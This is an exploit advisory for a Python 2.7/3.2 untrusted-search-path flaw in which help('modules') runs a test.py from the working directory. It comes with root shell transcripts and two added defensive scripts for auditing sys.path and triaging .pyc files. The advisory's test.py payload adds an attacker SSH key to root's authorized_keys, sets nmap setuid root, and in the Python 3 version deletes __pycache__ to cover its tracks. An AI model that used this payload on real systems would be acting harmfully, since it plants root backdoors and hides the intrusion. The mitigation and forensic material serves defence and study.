# Exploit Title: Python untrusted search path/code execution vulnerability
# Date: 7.6.12
# Exploit Author: rogueclown
# Vendor Homepage: http://www.python.org
# Software Link: http://www.python.org/getit/releases/
# Version: python 2.7.2 and python 3.2.1
# Tested on: linux (my test machine was OpenSUSE 12.1)
#
# This is an expansion on www.exploit-db.com/exploits/19523/ -- a big thanks,
# and the lion's share of the credit, to ShadowHatesYou (Shadow@SquatThis.net).
# They found the vulnerability; I just found a more generalized application
# of it.
#
# Basically, I found that it's not just python-wrapper that executes a test.py
# script within the current working directory when help('modules') is run --
# python itself does that. In python 2, it works just as ShadowHatesYou showed
# it in his python-wrapper exploit.
#
# This still works in python 3, but you have to do a bit more to cover your
# tracks. In the working directory, python 3 drops a __pycache__ directory
# with a .pyc file inside it. Most of the bytecode in there is not human
# readable, but it displays the shell command called by the script in
# plaintext, making it pretty obvious that something funny happened. However,
# you can get around this by making sure that your test.py script removes the
# __pycache__ directory from the working directory.
#
# rogueclown
# rogueclown@rogueclown.net
# 7.6.12
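The header above describes a search-path problem: the interactive interpreter puts '' (the current working directory) first on sys.path, and help('modules') hands that path to pkgutil.walk_packages, which imports every package it finds, so a file in the CWD whose name matches something imported during the scan is executed with the interpreter's privileges. The audit script below is an added example written for this page, not code from the advisory or from Python itself. Its function names and the scratch files it creates (a test.py shaped like the advisory's, a random.py that shadows the standard-library module, and a harmless notes_helper.py) are constructed for the demonstration. It reports, without importing anything, which sys.path entries point at the CWD and which files there would shadow a real module, and builds the sanitized path that python -I (isolated mode, Python 3.4 and later) starts with.

```python
"""Audit helpers for the untrusted-search-path issue in the advisory above.

Nothing from the audited directory is ever imported: the helpers only read
directory listings, which is the safe way to answer "what would run?".
"""
import os
import pkgutil
import sys
import tempfile


def cwd_path_entries(path=None):
    """Return the entries of `path` (default sys.path) that resolve to the
    current working directory. The interactive interpreter and `python -c`
    put '' at sys.path[0], so the CWD is searched before the standard library."""
    path = sys.path if path is None else path
    cwd = os.path.realpath(os.getcwd())
    hits = []
    for entry in path:
        if entry in ("", ".") or os.path.realpath(entry) == cwd:
            hits.append(entry)
    return hits


def sanitized_path(path=None):
    """`path` with every CWD entry removed: what isolated mode (`python -I`,
    Python 3.4+) gives you at startup."""
    path = sys.path if path is None else path
    bad = set(cwd_path_entries(path))
    return [entry for entry in path if entry not in bad]


def known_module_names(path=None):
    """Top-level module and package names reachable from the non-CWD entries
    of `path`. pkgutil.iter_modules only scans directory listings; unlike
    pkgutil.walk_packages (which pydoc uses, and which imports every package
    it finds) it executes nothing."""
    names = set(sys.builtin_module_names)
    for _finder, name, _ispkg in pkgutil.iter_modules(sanitized_path(path)):
        names.add(name)
    return names


def shadowing_files(directory, known=None):
    """Map each module name that `directory` would shadow (if it preceded the
    real location on sys.path, as '' does) to the file or package providing it."""
    known = known_module_names() if known is None else known
    shadows = {}
    for entry in os.listdir(directory):
        full = os.path.join(directory, entry)
        if os.path.isfile(os.path.join(full, "__init__.py")):
            name = entry                  # a package directory
        elif entry.endswith(".py"):
            name = entry[:-3]             # a plain module
        else:
            continue
        if name.isidentifier() and name in known:
            shadows[name] = full
    return shadows


def build_demo_directory():
    """Constructed sample (not from the advisory): a scratch directory with a
    test.py like the one in the transcript, a random.py that shadows the
    stdlib module, and an unrelated local module. Returns the directory path."""
    d = tempfile.mkdtemp(prefix="pydoc_audit_")
    with open(os.path.join(d, "test.py"), "w") as f:
        f.write('print("test.py from the CWD was imported")\n')
    with open(os.path.join(d, "random.py"), "w") as f:
        f.write("# stand-in for a file shadowing the stdlib random module\n")
    with open(os.path.join(d, "notes_helper.py"), "w") as f:
        f.write("# harmless local module\n")
    return d


if __name__ == "__main__":
    print("sys.path entries that point at the CWD:", cwd_path_entries())
    known = known_module_names()
    print("'test' is importable from the non-CWD path:", "test" in known)
    demo = build_demo_directory()
    for name, location in sorted(shadowing_files(demo, known).items()):
        print("%-14s would be shadowed by %s" % (name, location))
```

Run it from a directory you do not control (a shared scratch area, a checkout you just cloned) before opening an interactive interpreter there; the shadow list is what a walk over sys.path could pick up. The durable fix is to keep the CWD off the path: `python -I` for ad-hoc sessions, and on Python 3.11 and later the `-P` flag or `PYTHONSAFEPATH=1` environment variable, which drop the implicit sys.path[0] entry without the rest of isolated mode.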
############
# PYTHON 2 #
############
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
-rw-r--r-- 1 adalia users 144 Jul 4 15:47 test.py
adalia@bukkit:~/security/pythonwrapper> cat test.py
#!/usr/bin/python
import os
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
adalia@bukkit:~/security/pythonwrapper> su
Password:
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
bukkit:/home/adalia/security/pythonwrapper # python
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
/usr/lib64/python2.7/site-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed
import gobject._gobject
/usr/lib64/python2.7/site-packages/twisted/words/im/__init__.py:8: UserWarning: twisted.im will be undergoing a rewrite at some point in the future.
warnings.warn("twisted.im will be undergoing a rewrite at some point in the future.")
** Message: pygobject_register_sinkfunc is deprecated (GstObject)
Alacarte abc gtkunixprint readline
BaseHTTPServer aifc gzip repr
Bastion antigravity hashlib resource
BeautifulSoup anydbm heapq rexec
BeautifulSoupTests argparse hmac rfc822
CDROM array hotshot rlcompleter
CGIHTTPServer ast hpmudext robotparser
ConfigParser asynchat htmlentitydefs rpm
Cookie asyncore htmllib runpy
Crypto atexit httplib satsolver
DLFCN atk httplib2 scanext
DocXMLRPCServer atom ieee1284 sched
HTMLParser audiodev ihooks scout
IN base64 imaplib select
MimeWriter bdb imghdr serial
OpenSSL beaker imp sets
PAM binascii importlib setuptools
PyQt4 binhex imputil sgmllib
Queue bisect inspect sha
SimpleHTTPServer bsddb io shelve
SimpleXMLRPCServer butterfly itertools shlex
SocketServer bz2 json shutil
StringIO cPickle keyword signal
TYPES cProfile lib2to3 simplejson
UserDict cStringIO libproxy sip
UserList cairo libvboxjxpcom site
UserString calendar libxml2 smbc
VBoxAuth cgi libxml2mod smtpd
VBoxAuthSimple cgitb linecache smtplib
VBoxDD chunk linuxaudiodev sndhdr
VBoxDD2 cmath locale socket
VBoxDDU cmd logging spwd
VBoxDbg code louie sqlite3
VBoxGuestControlSvc codecs macpath sre
VBoxGuestPropSvc codeop macurl2path sre_compile
VBoxHeadless coherence mad sre_constants
VBoxKeyboard collections mailbox sre_parse
VBoxNetDHCP colorsys mailcap ssl
VBoxOGLhostcrutil commands mako stat
VBoxOGLhosterrorspu compileall markupbase statvfs
VBoxOGLrenderspu compiler markupsafe string
VBoxPython contextlib marshal stringold
VBoxPython2_7 cookielib math stringprep
VBoxREM copy md5 strop
VBoxRT copy_reg mhlib struct
VBoxSDL crypt mimetools subprocess
VBoxSharedClipboard csv mimetypes sunau
VBoxSharedCrOpenGL ctypes mimify sunaudio
VBoxSharedFolders cups mmap symbol
VBoxVMM cupsext modulefinder symtable
VBoxXPCOM cupshelpers multifile sys
VBoxXPCOMC curl multiprocessing sysconfig
VirtualBox datetime mutagen syslog
Xlib dbhash mutex tabnanny
_LWPCookieJar dbus mygpoclient tarfile
_MozillaCookieJar dbus_bindings netrc telepathy
__builtin__ decimal new telnetlib
__future__ difflib nis tempfile
_abcoll dircache nntplib termios
_ast dis ntpath textwrap
_bisect distutils nturl2path this
_bsddb doctest numbers thread
_codecs drv_libxml2 numpy threading
_codecs_cn dsextras opcode time
_codecs_hk dumbdbm operator timeit
_codecs_iso2022 dummy_thread optparse toaiff
_codecs_jp dummy_threading os token
_codecs_kr easy_install os2emxpath tokenize
_codecs_tw email ossaudiodev trace
_collections encodings packagekit traceback
_csv errno pango tty
_ctypes exceptions pangocairo twisted
_ctypes_test eyeD3 papyon types
_dbus_bindings fcntl parser unicodedata
_dbus_glib_bindings feedparser pcardext unittest
_elementtree filecmp pdb uno
_functools fileinput pickle unohelper
_hashlib fnmatch pickletools urlgrabber
_heapq formatter pipes urllib
_hotshot fpformat pkg_resources urllib2
_io fractions pkgutil urlparse
_json ftplib platform user
_locale functools plistlib uu
_lsprof future_builtins popen2 uuid
_md5 gc poplib vboxapi
_multibytecodec gdata posix vboxshell
_multiprocessing genericpath posixfile volkeys
_pyio getopt posixpath warnings
_random getpass pprint wave
_satsolver gettext profile weakref
_sha gi pstats webbrowser
_sha256 gio pty whichdb
_sha512 glib pwd wsgiref
_socket glob py_compile xdg
_sqlite3 gmenu pyclbr xdrlib
_sre gnome_sudoku pycurl xml
_ssl gnomekeyring pydoc xmllib
_strptime gobject pydoc_data xmlrpclib
_struct gpod pyexpat xxsubtype
_symtable gpodder pygst zeitgeist
_testcapi grp pygtk zipfile
_threading_local gst pynotify zipimport
_warnings gstoption quopri zlib
_weakref gtk random zope
_weakrefset gtktrayicon re
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
>>> exit()
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere
bukkit:/home/adalia/security/pythonwrapper #
############
# PYTHON 3 #
############
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
-rw-r--r-- 1 adalia users 169 Jul 4 15:51 test.py
adalia@bukkit:~/security/pythonwrapper> cat test.py
#!/usr/bin/python
import os
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
adalia@bukkit:~/security/pythonwrapper> su
Password:
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
bukkit:/home/adalia/security/pythonwrapper # python3
Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
CDROM binascii inspect shelve
DLFCN binhex io shlex
IN bisect itertools shutil
TYPES builtins json signal
__future__ bz2 keyword site
_abcoll cProfile linecache smtpd
_ast calendar locale smtplib
_bisect cgi logging sndhdr
_codecs cgitb macpath socket
_codecs_cn chunk macurl2path socketserver
_codecs_hk cmath mailbox spwd
_codecs_iso2022 cmd mailcap sqlite3
_codecs_jp code marshal sre_compile
_codecs_kr codecs math sre_constants
_codecs_tw codeop mimetypes sre_parse
_collections collections mmap ssl
_compat_pickle colorsys modulefinder stat
_csv compileall multiprocessing string
_ctypes concurrent netrc stringprep
_datetime configparser nis struct
_dummy_thread contextlib nntplib subprocess
_elementtree copy ntpath sunau
_functools copyreg nturl2path symbol
_hashlib crypt numbers symtable
_heapq csv opcode sys
_io ctypes operator sysconfig
_json datetime optparse syslog
_locale decimal os tabnanny
_lsprof difflib os2emxpath tarfile
_markupbase dis ossaudiodev telnetlib
_multibytecodec distutils parser tempfile
_multiprocessing doctest pdb termios
_pickle dummy_threading pickle textwrap
_posixsubprocess email pickletools this
_pyio encodings pipes threading
_random errno pkgutil time
_socket fcntl platform timeit
_sqlite3 filecmp plistlib token
_sre fileinput poplib tokenize
_ssl fnmatch posix trace
_string formatter posixpath traceback
_strptime fractions pprint tty
_struct ftplib profile turtle
_symtable functools pstats types
_thread gc pty unicodedata
_threading_local genericpath pwd unittest
_warnings getopt py_compile urllib
_weakref getpass pyclbr uu
_weakrefset gettext pydoc uuid
abc glob pydoc_data warnings
aifc grp queue wave
antigravity gzip quopri weakref
argparse hashlib random webbrowser
array heapq re wsgiref
ast hmac readline xdrlib
asynchat html reprlib xxlimited
asyncore http resource xxsubtype
atexit imaplib rlcompleter zipfile
audioop imghdr runpy zipimport
base64 imp sched zlib
bdb importlib select
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
>>> exit()
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere
bukkit:/home/adalia/security/pythonwrapper # ls __pycache__
ls: cannot access __pycache__: No such file or directory
bukkit:/home/adalia/security/pythonwrapper #
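The Python 3 section above makes a forensic point: importing test.py leaves a __pycache__/test.*.pyc whose bytecode is mostly opaque but whose string constants (the shell command) are stored in plaintext, which is why the script deletes the directory. The triage helper below is an added example written for this page, not code from the advisory or from Python; its function names are assumptions, and the .pyc it examines is compiled from a constructed, harmless script that only echoes a marker string. It unmarshals a cache file written by the running interpreter and pulls out the names it references and every string constant, including those inside nested functions, without executing any of it.

```python
"""Triage a __pycache__ .pyc without running it: recover referenced names and
string constants, the artefact the advisory's Python 3 transcript describes."""
import importlib.util
import marshal
import os
import py_compile
import sys
import tempfile
import types


def load_code_from_pyc(pyc_path):
    """Unmarshal the code object in a .pyc written by the running interpreter.
    Only the current interpreter's header layout is handled: 16 bytes since
    Python 3.7 (magic, flags, source mtime or hash), 12 bytes on 3.3 to 3.6."""
    with open(pyc_path, "rb") as f:
        data = f.read()
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("%s was produced by a different Python version" % pyc_path)
    header_len = 16 if sys.version_info >= (3, 7) else 12
    return marshal.loads(data[header_len:])


def string_constants(code):
    """Every str/bytes constant in `code` and in the code objects nested in it
    (functions, classes, comprehensions). Pure data walk, nothing is executed."""
    found = []
    for const in code.co_consts:
        if isinstance(const, (str, bytes)):
            found.append(const)
        elif isinstance(const, types.CodeType):
            found.extend(string_constants(const))
    return found


def triage_pyc(pyc_path):
    """Return the global names the module touches and its string constants."""
    code = load_code_from_pyc(pyc_path)
    return {"names": list(code.co_names), "strings": string_constants(code)}


def build_demo_pyc():
    """Constructed sample (not the advisory's file): a harmless script with the
    same shape as test.py, one os.system call, byte-compiled into the
    __pycache__ location Python 3 would use on import. Returns the .pyc path."""
    d = tempfile.mkdtemp(prefix="pyc_triage_")
    src = os.path.join(d, "test.py")
    with open(src, "w") as f:
        f.write('import os\nos.system("echo constructed-demo-command")\n')
    pyc = importlib.util.cache_from_source(src)   # <d>/__pycache__/test.cpython-XY.pyc
    py_compile.compile(src, cfile=pyc, doraise=True)
    return pyc


if __name__ == "__main__":
    pyc = build_demo_pyc()
    report = triage_pyc(pyc)
    print("artefact:", pyc)
    print("names referenced:", report["names"])
    for s in report["strings"]:
        print("string constant:", repr(s))
```

Two caveats from the transcript itself apply when you use this on a real incident: the cache is only written when the file is imported (as help('modules') does), not when it is run as a script, and an attacker who cleans up, as the Python 3 test.py does with rm -rf __pycache__, leaves nothing to triage, so a missing __pycache__ next to a suspicious module is itself worth recording.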